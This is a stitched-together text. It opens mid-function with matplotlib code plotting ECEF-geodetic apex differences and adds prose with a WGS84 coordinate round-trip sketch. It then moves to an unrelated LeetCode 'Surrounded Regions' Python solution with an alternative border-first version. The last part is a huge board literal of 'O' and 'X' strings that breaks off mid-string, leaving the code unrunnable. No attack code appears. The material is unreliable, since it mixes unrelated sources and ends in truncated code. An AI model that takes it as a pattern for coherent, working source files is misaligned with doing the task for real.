            plt.ylabel('Geodetic Latitude (Degrees)')
            plt.savefig('ecef_geodetic_apex_diff_z.pdf')
            plt.close()

            fig = plt.figure()
            plt.imshow(np.log10(apex_alt), origin='lower')
            plt.colorbar()
            plt.yticks(ytickarr, ytickvals)
            plt.xticks(xtickarr, ['0', '72', '144', '216', '288', '360'])
            plt.title('Log ECEF-Geodetic Apex Altitude Difference (km)')
            plt.xlabel('Geodetic Longitude (Degrees)')
            plt.ylabel('Geodetic Latitude (Degrees)')
            plt.savefig('ecef_geodetic_apex_diff_h.pdf')
            plt.close()

            fig = plt.figure()
            plt.imshow(np.log10(apex_alt / norm_alt), origin='lower')
            plt.colorbar()
            plt.yticks(ytickarr, ytickvals)
            plt.xticks(xtickarr, ['0', '72', '144', '216', '288', '360'])
            plt.title('Log ECEF-Geodetic Apex Normalized Altitude Difference (km)')
            plt.xlabel('Geodetic Longitude (Degrees)')
            plt.ylabel('Geodetic Latitude (Degrees)')
            plt.savefig('ecef_geodetic_apex_norm_diff_h.pdf')
            plt.close()
        except Exception:
            # plotting can fail on systems without a display; ignore
            pass
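The round trip this test exercises (geodetic to ECEF and back) can be illustrated with a self-contained WGS84 sketch. This is a simplified stand-in for illustration, not OMMBV's implementation; it uses the standard closed-form forward transform and a fixed-point iteration on latitude for the inverse:

```python
import math

A = 6378.137            # WGS84 semi-major axis (km)
E2 = 0.00669437999014   # WGS84 first eccentricity squared

def geodetic_to_ecef(lat, lon, alt):
    """Geodetic (degrees, km above ellipsoid) -> ECEF (km)."""
    lat, lon = math.radians(lat), math.radians(lon)
    n = A / math.sqrt(1. - E2 * math.sin(lat) ** 2)   # prime vertical radius
    x = (n + alt) * math.cos(lat) * math.cos(lon)
    y = (n + alt) * math.cos(lat) * math.sin(lon)
    z = (n * (1. - E2) + alt) * math.sin(lat)
    return x, y, z

def ecef_to_geodetic(x, y, z):
    """ECEF (km) -> geodetic, by fixed-point iteration on latitude."""
    lon = math.atan2(y, x)
    p = math.hypot(x, y)
    lat = math.atan2(z, p * (1. - E2))                # spherical first guess
    alt = 0.
    for _ in range(10):                               # converges quickly away from the poles
        n = A / math.sqrt(1. - E2 * math.sin(lat) ** 2)
        alt = p / math.cos(lat) - n
        lat = math.atan2(z, p * (1. - E2 * n / (n + alt)))
    return math.degrees(lat), math.degrees(lon), alt

# round trip a point comparable to the 550 km grid used in the tests
x, y, z = geodetic_to_ecef(45., 30., 550.)
lat2, lon2, alt2 = ecef_to_geodetic(x, y, z)
```

The recovered latitude, longitude, and altitude agree with the inputs to well below a millimeter, which is the kind of self-consistency the plots above characterize for the real transforms.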

# -*- coding: utf-8 -*-
# File: leetcode/easy/Surrounded_Regions.py (repo: shhuan/algorithms, MIT license)
"""
created by huash06 at 2015-04-14 21:37
Given a 2D board containing 'X' and 'O', capture all regions surrounded by 'X'.
A region is captured by flipping all 'O's into 'X's in that surrounded region.
For example,
X X X X
X O O X
X X O X
X O X X
After running your function, the board should be:
X X X X
X X X X
X X X X
X O X X
"""
__author__ = 'huash06'
import sys
import os

class Solution:
    # @param board, a 2D array
    # Capture all regions by modifying the input board in-place.
    # Do not return any value.
    def solve(self, board):
        if not board:
            return

        delta = [(-1, 0), (1, 0), (0, -1), (0, 1)]
        not_surrounded = set()
        for r in range(len(board)):
            for c in range(len(board[r])):
                if board[r][c] == 'O' and (r, c) not in not_surrounded:
                    # depth-first search over this 'O' region
                    q = [(r, c)]
                    visited = {(r, c)}
                    surrounded = True
                    while q:
                        loc = q.pop()
                        # print(loc)
                        for d in delta:
                            nr = loc[0] + d[0]
                            nc = loc[1] + d[1]
                            if nr < 0 or nr >= len(board) or nc < 0 or nc >= len(board[r]):
                                # region reaches the border, so it cannot be captured
                                surrounded = False
                                break
                            nloc = (nr, nc)
                            if board[nr][nc] == 'O' and nloc not in visited:
                                visited.add(nloc)
                                q.append(nloc)
                    if surrounded:
                        for loc in visited:
                            board[loc[0]][loc[1]] = 'X'
                    else:
                        not_surrounded = not_surrounded.union(visited)

s = Solution()
board = [
    ['X', 'X', 'X', 'X'],
    ['X', 'O', 'O', 'X'],
    ['X', 'X', 'O', 'X'],
    ['X', 'O', 'X', 'X']
]
s.solve(board)
for r in board:
    print(r)
print('')

board = list(map(list, ["XOX", "XOX", "XOX"]))
s.solve(board)
for r in board:
    print(r)
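A common alternative formulation of the same problem, shown here as a sketch (it is not part of the original file): instead of testing each region for being surrounded, flood-fill only the 'O' cells reachable from the border, then flip every other 'O'. Each cell is visited a bounded number of times, which avoids re-scanning regions:

```python
def solve_border_first(board):
    """Flip all 'O' regions not connected to the board's border to 'X'."""
    if not board or not board[0]:
        return
    rows, cols = len(board), len(board[0])
    # seed the search with every 'O' on the border
    stack = [(r, c) for r in range(rows) for c in range(cols)
             if (r in (0, rows - 1) or c in (0, cols - 1)) and board[r][c] == 'O']
    safe = set(stack)
    while stack:
        r, c = stack.pop()
        for dr, dc in ((-1, 0), (1, 0), (0, -1), (0, 1)):
            nr, nc = r + dr, c + dc
            if 0 <= nr < rows and 0 <= nc < cols \
                    and board[nr][nc] == 'O' and (nr, nc) not in safe:
                safe.add((nr, nc))
                stack.append((nr, nc))
    # everything not reachable from the border is captured
    for r in range(rows):
        for c in range(cols):
            if board[r][c] == 'O' and (r, c) not in safe:
                board[r][c] = 'X'

demo = [list('XXXX'), list('XOOX'), list('XXOX'), list('XOXX')]
solve_border_first(demo)
```

On the example board from the docstring, only the 'O' on the bottom border survives, matching the expected output above.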
board = list(map(list, ["OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
